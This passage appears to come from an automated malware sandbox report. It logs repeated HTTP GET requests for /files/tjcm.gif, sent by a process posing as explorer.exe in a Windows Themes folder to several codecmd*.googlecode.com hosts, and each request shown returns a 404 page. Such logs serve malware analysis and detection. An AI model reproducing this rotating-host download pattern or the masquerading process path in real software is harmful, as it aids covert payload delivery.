                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              95192.168.2.65124764.233.184.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:23.651115894 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:24.376270056 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:24 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:24.376295090 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              96192.168.2.651248173.194.76.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:24.753468037 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:25.468628883 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:25 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:25.468688011 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              97192.168.2.651249142.251.173.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:25.943408012 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:26.666480064 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:26 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:26.666589975 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              98192.168.2.65125064.233.184.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:27.050354004 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:27.743273020 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:27 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:27.743331909 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              99192.168.2.651251173.194.76.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:28.216428995 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:28.961555004 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:28 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:28.961582899 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:10:28.961595058 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              100192.168.2.651252142.251.173.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:29.466670036 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:30.171104908 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:30 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:30.171128035 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              101192.168.2.65125364.233.184.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:30.637705088 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:31.361170053 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:31 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 